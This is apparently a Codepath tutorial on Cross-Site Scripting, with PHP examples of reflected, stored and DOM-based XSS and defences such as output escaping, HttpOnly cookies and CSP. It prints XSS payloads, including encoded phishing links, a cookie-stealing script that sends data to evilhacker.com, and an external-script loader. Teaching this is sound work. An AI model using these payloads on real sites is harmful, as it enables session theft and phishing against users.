Codepath

Cross-Site Scripting

Cross-Site Scripting becomes possible when code places user-supplied data in a response without sanitizing it first. The name comes from the attacker's ability to run JavaScript on someone else's site. Cross-Site Scripting is often abbreviated as "XSS".

OWASP ranked it #3 on its 2013 Top 10 list of web application security risks and described it as the most prevalent web application security flaw.

There are numerous ways a hacker can get JavaScript into a page; which ones work depends on what incoming data is output again without being properly sanitized. Once the hacker gets their JavaScript into the page response, the script will execute, usually for an unsuspecting user. The script can perform any number of actions, including stealing site cookies or session data. It succeeds because the browser believes that all JavaScript provided with the page is trustworthy.


Types of XSS

There are three types of Cross-Site Scripting.

  • Reflected
    • Data from URLs or forms
    • Runs immediately when data is received
  • Stored
    • Data from database, cookies, and sessions
    • Runs later when data is retrieved
  • DOM-based
    • Data generated by JavaScript
    • Runs when user triggers JavaScript events

Reflected XSS

Reflected XSS occurs when a script sent in a request is echoed back in the response and runs immediately in the victim's browser. The JavaScript is carried in the URL data or form data. It is called "reflected" because it bounces right back. In a well-designed attack, the user will not even notice that the script has run.

As an example, imagine a search box at the top of a website. When a user submits a search term, the application searches the database for products matching that term. If no products are found, it responds with:

<h1>No results were found for: <?php echo $term; ?></h1>

If the search request was:

GET /search.php?term=candy

The application would return:

<h1>No results were found for: candy</h1>

Notice that the data being submitted in the URL query is not being sanitized to remove or disable JavaScript before it is output to HTML.

A malicious request like:

GET /search.php?term=<script>alert('XSS!');</script>

Would output this code in the HTML sent to the browser:

<h1>No results were found for: <script>alert('XSS!');</script></h1>

Sending a simple JavaScript alert, like the one above, is one of the easiest ways to test for XSS vulnerabilities. However, it is important to realize that the JavaScript code between the script tags could be anything.
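
One possible fix for the search page above is to encode the term as HTML text before echoing it. The following is a minimal sketch, not the original application's code: the helper names escape_html() and render_no_results() are hypothetical, while htmlspecialchars() is PHP's built-in encoder.

```php
<?php
// Hypothetical helper: encode a value so the browser treats it as text, not markup.
function escape_html(string $value): string
{
    // ENT_QUOTES encodes both double and single quotes; ENT_SUBSTITUTE replaces
    // invalid UTF-8 sequences instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hypothetical stand-in for the "no results" branch of search.php.
function render_no_results(string $term): string
{
    return '<h1>No results were found for: ' . escape_html($term) . '</h1>';
}

// In search.php the term would come from $_GET['term']; a fixed string is used here.
echo render_no_results("<script>alert('XSS!');</script>"), "\n";
```

With this change the browser displays the script tags as literal text instead of executing them.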


XSS using an HTML attribute

Here is another example using a login form. Notice that the username text input will be populated by the value of $username if available. If a login attempt fails, then the submitted username will reappear in the form so the user can try again with a new password.

<!-- login.php -->
<input type="text" name="username" value="<?php echo $username; ?>" /><br />
<input type="password" name="password" value="" />

A hacker enters the following username and password and submits the form.

username: " /><script>alert('XSS!');</script>
password:

The login will fail and the form will be shown again with the hacker's code inserted.

<!-- login.php -->
<input type="text" name="username" value="" /><script>alert('XSS!');</script>" /><br />
<input type="password" name="password" value="" />

Notice that the malicious string closes the double quotes and the input tag to break out of the HTML tag attribute. This allows the script tags to be placed in the HTML body and executed. It does not matter very much where dynamic data is inserted in the HTML page; some version of a string can usually be crafted to make the script execute.
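
The breakout depends on the quote character reaching the page unencoded. As a sketch, assuming the form is rendered by a hypothetical helper named render_username_input(), encoding the value with ENT_QUOTES keeps the payload inside the attribute. The last line shows why the flag matters: ENT_COMPAT, which was the default before PHP 8.1, leaves single quotes untouched.

```php
<?php
// Hypothetical helper that renders the username field from login.php.
function render_username_input(string $username): string
{
    // ENT_QUOTES encodes " and ' so the value cannot close the attribute,
    // whichever quote style the template uses.
    $safe = htmlspecialchars($username, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="username" value="' . $safe . '" />';
}

$payload = '" /><script>alert(\'XSS!\');</script>';

// The payload now stays inside the value attribute as inert text.
echo render_username_input($payload), "\n";

// For comparison: ENT_COMPAT leaves single quotes as they are, which is
// unsafe if a template wraps the attribute value in single quotes.
echo htmlspecialchars("' onfocus='alert(1)", ENT_COMPAT, 'UTF-8'), "\n";
```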


XSS encoded scripts in URLs

It is also possible to put scripts in URL strings provided that they are properly URL encoded. This is a powerful attack because other users can be tricked into clicking on the links using baiting or phishing techniques.

Imagine that the login form in the previous example also allows pre-populating the username based on a query string value.

GET /login.php?username=superstudent

A hacker could exploit it with an encoded script in the URL of a link.

<a href="http://foo.com/login.php?username=%22+%2F%3E%3Cscript%3Ealert%28%27XSS%21%27%29%3B%3C%2Fscript%3E">
  Click here for free money!
</a>

PHP automatically decodes URL query strings, and the content would be inserted in the value attribute of the text input. The result would be the same as the previous example.

<!-- login.php -->
<input type="text" name="username" value="" /><script>alert('XSS!');</script>" /><br />
<input type="password" name="password" value="" />

The difference is that this time it is not the hacker who triggers the XSS attack. It is another user who unsuspectingly clicked on a link. If that user is currently logged in to the website, then the script can take advantage of their privileged access to view information or take actions that a script run by a logged-out user could not. It also allows the script to access the user's browser cookies for the current website.
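
The encoded link and PHP's automatic decoding can be reproduced in a few lines. This is an illustrative sketch: urlencode() yields the encoding shown in the link, and parse_str() is used here as a stand-in for the way PHP fills $_GET from the query string.

```php
<?php
$payload = '" /><script>alert(\'XSS!\');</script>';

// urlencode() produces the form-style encoding seen in the link (spaces become "+").
$encoded = urlencode($payload);
echo $encoded, "\n";

// parse_str() decodes a query string the same way PHP fills $_GET,
// so the application receives the original payload again.
parse_str('username=' . $encoded, $query);
var_dump($query['username'] === $payload);
```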


XSS Cookie Theft

One of the most common targets for XSS attacks is user cookies. Cookies are data stored in the user's browser by a website. They are stored on a per-domain basis, so a website only has access to the cookies it set itself.

In XSS, JavaScript is embedded in the response coming from the website, so the browser views it as trustworthy code from the current domain and gives it access to the website's previously stored cookies. In JavaScript, accessing cookie data is as simple as reading document.cookie.

In this example, the JavaScript accesses the cookie data and sends it as a string to a URL on another server.

GET /login.php?username=" /><script>document.location= 'http://evilhacker.com?stolen_cookie='+document.cookie;</script>

The code above is shown unencoded for readability. Encoded in a link, it would look like:

<a href="http://foo.com/login.php?username=%22+%2F%3E%3Cscript%3Edocument.location%3D+%27http%3A%2F%2Fevilhacker.com%3Fstolen_cookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E">
  Click here for free money!
</a>

XSS with External JavaScript

The JavaScript "payload" does not have to be simple or visible. It is just as easy to load an external JavaScript file as to provide inline code, and that external file can be long and complex.

GET /login.php?username=" /><script src="http://evilhacker.com/bad.js"></script>

Stored XSS

Stored Cross-Site Scripting occurs when the data is not output to a response immediately, but is instead stored to be displayed later. It is like planting an XSS landmine in the application data. The payload could be stored in the database, in cookie or session data, or even in a file. When the data is retrieved and viewed, the script will execute if the data is not properly sanitized. Stored XSS is also called "persistent XSS"; when the attacker cannot observe where the payload eventually executes, it is sometimes referred to as "Blind XSS".

Stored XSS is effective because applications regularly read from data storage, often through unexpected avenues. For example, a user table in a database might be accessed not only by the public-facing website, but also by administrator tools, log review applications, and data analytics code. Any of these avenues could be vulnerable, and they are often less guarded, either because awareness of Stored XSS is lower or because the data is presumed to have been sanitized already. These "back-office" tools are often closed-source and written by third parties who may have less security knowledge.
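
A back-office view can defend itself by encoding every stored value at output time, whatever happened when the value was saved. The sketch below assumes hypothetical rows from a users table and a hypothetical render_user_rows() function; it is not taken from any real administrator tool.

```php
<?php
// Hypothetical rows as they might come back from a users table; the second
// display name carries a stored payload submitted through the public site.
$rows = [
    ['id' => 1, 'display_name' => 'Alice'],
    ['id' => 2, 'display_name' => '<script src="http://evilhacker.com/bad.js"></script>'],
];

// Hypothetical back-office view: every stored value is encoded when it is
// written into the page, regardless of how it was handled when it was saved.
function render_user_rows(array $rows): string
{
    $html = '';
    foreach ($rows as $row) {
        $name = htmlspecialchars((string) $row['display_name'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
        $html .= '<tr><td>' . (int) $row['id'] . '</td><td>' . $name . "</td></tr>\n";
    }
    return $html;
}

echo render_user_rows($rows);
```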

Matthew Bryant has a good write-up on his blog of the technique and of how he found an XSS vulnerability at GoDaddy. He had actually forgotten that he had submitted the XSS payload. Later, when he called customer service with a real question, the Stored XSS was triggered.


DOM-based XSS

It has become common for modern web applications to handle much of the user interaction on the client-side using JavaScript. Instead of sending a request to the server, the page already has the code necessary to respond to an action.

DOM-based XSS embeds the attack script into the existing page. The browser's in-memory representation of the current page is known as the "DOM", short for "Document Object Model". DOM-based XSS is similar to Reflected XSS because it runs immediately, but the script does not arrive in a response from the server. Instead, it is triggered by JavaScript events on the page.

As an example, imagine a webpage that lists 100 restaurants. At the top of the list is a text input field that allows live filtering of the results based on the user's entry. An attacker could enter a carefully crafted string in the box. If the page's JavaScript processes the string without first sanitizing it, the malicious script will execute. It all takes place on the existing page, using existing code: the page does not reload and no request is sent to the server.


XSS Prevention

Mapping data passageways and exposures helps to determine where data is input, transferred, stored, and output. This will identify the areas of concern for XSS prevention.

The first defense in preventing XSS is to validate and sanitize incoming data. Use whitelists of allowed characters and validate that data matches expected input. Use a well-tested library for sanitization, because there are many tricks to bypass detection and it can be challenging to plan for them all.
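
Validation against an expected format might look like the sketch below. The rules themselves (usernames of 3 to 20 letters, digits, or underscores; page numbers between 1 and 1000) and the function names are assumptions chosen for illustration. This covers validation only and is not a replacement for a well-tested sanitization library.

```php
<?php
// Hypothetical rule: usernames are 3 to 20 characters drawn from an allowlist
// of ASCII letters, digits, and underscores.
function is_valid_username(string $username): bool
{
    return preg_match('/\A[A-Za-z0-9_]{3,20}\z/', $username) === 1;
}

// Hypothetical rule: a page number must be an integer between 1 and 1000.
// Returns null when the input does not match.
function parse_page_number(string $raw): ?int
{
    $page = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => 1000],
    ]);
    return $page === false ? null : $page;
}

var_dump(is_valid_username('superstudent'));                  // bool(true)
var_dump(is_valid_username('" /><script>alert(1)</script>')); // bool(false)
var_dump(parse_page_number('42'));                            // int(42)
var_dump(parse_page_number('42<script>'));                    // NULL
```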

The second defense is sanitizing all data before output, even if the data has been previously sanitized. The correct sanitizing technique depends on the output destination. There are five primary output types to monitor.

Destination       Example usage
HTML content      <li>$user_input</li>
HTML attribute    <input value="$user_input" />
JavaScript        var name='$user_input';
CSS properties    color: $user_input;
URL               http://abc.com?q=$user_input
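
Each destination needs its own encoding. The following sketch pairs the five destinations listed above with built-in PHP functions; the helper names (for_html(), for_js(), for_url_param(), for_css_color()) are hypothetical, and the CSS rule that only six-digit hex colors are accepted is an assumption made to keep the example small.

```php
<?php
// Hypothetical helpers, one per output destination.

function for_html(string $v): string
{
    // HTML content and quoted HTML attribute values.
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function for_js(string $v): string
{
    // Emits a complete, quoted JavaScript string literal; the JSON_HEX_* flags
    // turn <, >, &, ' and " into \uXXXX escapes so "</script>" cannot appear.
    return json_encode($v, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR);
}

function for_url_param(string $v): string
{
    // Percent-encodes everything except letters, digits, "-", "_", "." and "~".
    return rawurlencode($v);
}

function for_css_color(string $v): string
{
    // PHP has no built-in CSS encoder, so this sketch only accepts hex
    // colors and falls back to a fixed value otherwise.
    return preg_match('/\A#[0-9a-fA-F]{6}\z/', $v) === 1 ? $v : '#000000';
}

$user_input = "</script><script>alert('XSS!')</script>";

echo '<li>', for_html($user_input), "</li>\n";
echo '<script>var name = ', for_js($user_input), ";</script>\n";
echo '<a href="http://abc.com?q=', for_url_param($user_input), "\">link</a>\n";
echo '<p style="color: ', for_css_color($user_input), "\">text</p>\n";
```

Note that for_js() returns the surrounding quotes itself, so the template must not add its own.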

HttpOnly cookies

A good defense against XSS cookie theft is to turn off JavaScript's access to cookies by setting the HttpOnly flag on them. In PHP, the flag can be set per cookie as an option to the setcookie() function, and it can be enabled for session cookies with the session.cookie_httponly setting in the php.ini file. (See cookie and session options)
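
As a rough sketch, the flag could be set as follows. The cookie name remember_me, its random value, and the helper http_only_cookie_options() are hypothetical; the options-array form of setcookie() assumes PHP 7.3 or later.

```php
<?php
// Hypothetical helper: cookie options with JavaScript access disabled.
function http_only_cookie_options(int $lifetimeSeconds): array
{
    return [
        'expires'  => time() + $lifetimeSeconds,
        'path'     => '/',
        'httponly' => true, // hide the cookie from document.cookie
    ];
}

// Cookies are sent as headers, so they must be set before any output.
if (!headers_sent()) {
    // Runtime equivalent of session.cookie_httponly = 1 in php.ini.
    ini_set('session.cookie_httponly', '1');

    // 'remember_me' is a hypothetical cookie name with a random value.
    setcookie('remember_me', bin2hex(random_bytes(16)), http_only_cookie_options(3600));
}
```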


Content Security Policy (CSP)

Defining a Content Security Policy can prevent the loading of external JavaScript. A CSP is sent as an HTTP response header and tells the browser which sources scripts, styles, and other external resources may be loaded from.
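
A policy could be sent from PHP along these lines. The build_csp() helper is hypothetical, and the policy shown is only an example, not a recommendation for every site: it restricts all resources, including scripts, to the page's own origin, which also blocks inline script blocks.

```php
<?php
// Hypothetical helper: turn a directive map into a CSP header value.
function build_csp(array $directives): string
{
    $parts = [];
    foreach ($directives as $name => $sources) {
        $parts[] = $name . ' ' . implode(' ', $sources);
    }
    return implode('; ', $parts);
}

// Example policy (an assumption): same-origin resources and scripts only.
$policy = build_csp([
    'default-src' => ["'self'"],
    'script-src'  => ["'self'"],
]);

// Headers must be sent before any page output.
if (!headers_sent()) {
    header('Content-Security-Policy: ' . $policy);
}
```

Under this policy, a script tag pointing at another domain, such as the external JavaScript payload shown earlier, would be refused by a browser that supports CSP.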


OWASP Cross Site Scripting Prevention

OWASP XSS Filter Evasion Cheat Sheet
